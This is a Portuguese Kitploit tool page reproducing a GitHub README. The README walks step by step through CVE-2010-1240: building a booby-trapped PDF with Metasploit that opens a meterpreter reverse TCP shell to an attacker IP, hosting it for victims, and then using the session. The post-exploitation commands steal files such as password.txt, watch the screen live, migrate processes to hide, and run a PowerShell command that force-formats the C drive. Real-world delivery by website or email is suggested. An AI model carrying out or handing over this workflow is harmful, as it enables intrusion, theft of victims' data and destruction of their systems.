Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Embedded-Backdoor-Connection — Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando o arquivo PDF de aparência inocente para o alvo, que na verdade contém um payload embutido. A exploração foi tornado pública como CVE-2010-1240. | Kitploit
Ferramentas/GitHubGitHub/omarothmann/embedded-backdoor-connection
Ferramentas de PhishingGeração de PayloadsExploraçãoPós-ExploraçãoTestes de PenetraçãoComando e ControleAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
omarothmann/embedded-backdoor-connection

Embedded-Backdoor-Connection

Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando o arquivo PDF de aparência inocente para o alvo, que na verdade contém um payload embutido. A exploração foi tornado pública como CVE-2010-1240.

Ver Repositório
84há 4 anosAinda não revisado

Embedded Backdoor Connection via PDF Files 😈

trazido a você por    

Introdução

Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando o arquivo PDF de aparência inocente para o alvo, que na verdade consiste em um payload embutido. A exploração foi tornada pública como CVE-2010-1240.

Assim que o PDF é aberto no Adobe Reader, os usuários que estão sendo enganados por nós para concordar com os pop-ups de segurança nos permitirão obter uma sessão meterpreter conectada aos seus dispositivos via conexão TCP reversa. Até esse momento, todos os seus dados e o que estão fazendo agora estão sob nossa vigilância.

Hehe~Boi

Lista de Softwares/Ferramentas

  • Metasploit
  • Adobe Reader <= 8.1.2

Ambiente

Kali Linux         Windows 7 or 10         Adobe Reader        

  • Máquina Atacante: Kali Linux versão 2021.1
  • SO Alvo: Windows 10 (x86) ou Windows 7 (x86)
  • Software Alvo: Adobe Reader 8.1.2

Passos Detalhados

Primeiro, iniciamos o MSFconsole que fornece interface de linha de comando para acessarmos o framework Metasploit.

root@kitploit:~
msfconsole

Em seguida, procuramos por exploits que correspondam à nossa plataforma Windows alvo e ao Adobe PDF Reader, onde será exibida uma lista completa de exploits que podem ser usados para sequestrar a máquina Windows da vítima e explorar as vulnerabilidades do Adobe PDF Reader.

root@kitploit:~
search type:exploit platform:windows adobe pdf

Nesta exploração, selecionamos e usamos o módulo "adobe_pdf_embedded_exe" usando o comando abaixo para atingir o objetivo de sequestrar a vítima.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Também podemos verificar as informações do exploit usando o comando “info” conforme mostrado abaixo:

root@kitploit:~
info

Em seguida, configuramos o payload para usar conexão TCP reversa. Também usamos o Meterpreter que fornece um shell interativo que facilita o uso de todos os tipos de funções inserindo e executando código para explorar a máquina da vítima.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

Em seguida, definiremos o host e a porta de escuta. Para LHOST, precisamos colocar o endereço IP da máquina atacante, que neste caso é o endereço IP da nossa máquina Kali (10.0.2.4)*.

  • *p.s.
    • Você deve usar o IP da sua própria máquina Kali
    • Você pode usar um número de porta diferente

Enquanto isso, para LPORT, cabe a nós definir um número de porta que não seja comumente usada.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

Em seguida, definiremos o arquivo de entrada para a base do PDF com a flag INFILENAME*. Depois, definiremos o nome do arquivo para algo que atraia o interesse da vítima para abrir o arquivo PDF malicioso.

  • *p.s.
    • Você deve garantir o caminho do seu arquivo PDF
    • Você pode usar um nome de arquivo diferente
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

Podemos visualizar nossas opções novamente antes de executarmos o comando “exploit” para gerar o payload junto com o PDF.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

Assim que terminarmos de gerar o arquivo PDF, moveremos o arquivo para /var/www/html, que é o diretório da nossa máquina Kali para hospedar o servidor de aplicação web para nossa vítima baixar o arquivo PDF posteriormente.

  • Nota:
    • Se você definiu um nome de arquivo diferente, certifique-se de copiar o caminho correto!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

Em seguida, para configurar nosso listener, usaremos "exploit/multi/handler". Novamente, definiremos o payload, LHOST, LPORT alinhados com o que definimos ao gerar o arquivo PDF malicioso. Então executaremos o payload.

  • Nota:
    • LHOST: Observe o endereço IP da sua própria máquina Kali
    • LPORT: Se você definiu um número de porta diferente, certifique-se de digitá-lo corretamente
    • show info ou show options é um comando opcional para executar.
      • Executá-lo é apenas para verificar o que você acabou de definir
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

Em outro terminal, verificamos o status do servidor Apache para garantir que ele está em execução para hospedar nosso arquivo PDF em /var/www/html para a vítima baixar o arquivo.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Na máquina Windows, abra qualquer navegador como o Chrome e digite o IP do nosso Kali (10.0.2.4)* para acessar o servidor de aplicação web da máquina Kali.

*Nota: Observe o endereço IP da sua própria máquina Kali

Em seguida, simule um usuário salvando o arquivo PDF pretendido.

Assim que o arquivo for aberto pela vítima no Adobe Reader 8.1.2 aceitando as mensagens de segurança do prompt, podemos então observar em nossa máquina Kali que temos uma nova sessão conectada via conexão TCP reversa.

Em um cenário real, montaremos um site com o PDF de payload embutido para que a vítima baixe ou anexe o arquivo via e-mail.


Resultado da exploração

Em seguida, podemos acessar remotamente a máquina da vítima e então realizar mais comportamentos maliciosos que desejamos na sessão do meterpreter.

Para mostrar uma lista de coisas que podemos fazer

root@kitploit:~
help

Listar diretório atual

root@kitploit:~
pwd

Listar os arquivos nesse diretório

root@kitploit:~
ls

Baixar pasta ou arquivo da máquina vítima

Por exemplo, há um arquivo chamado password.txt, podemos emitir o comando download password.txt

root@kitploit:~
download [folder name | filename with extension]

Criar arquivo na máquina vítima

Claro, podemos escrever script malicioso (implantando backdoor) para nos manter conectados à máquina Windows se formos realmente maus! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Interagir com o Windows

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

Adicional

No entanto, o atacante pode reduzir a suspeita migrando o processo do meterpreter para um diferente usando o módulo migrate na sessão do meterpreter.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

Aqui, ele irá automaticamente gerar um novo processo na máquina da vítima para onde migrar. A vítima então poderá deletar o arquivo PDF infectado, completamente alheia de que o processo já foi para outro lugar.

O atacante pode ainda criar script malicioso na máquina alvo usando o prompt de comando (cmd) ou PowerShell, capaz de derrubar todo o sistema operacional para que não funcione corretamente.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

Vídeo de Demonstração

Demonstração

Baixar ferramenta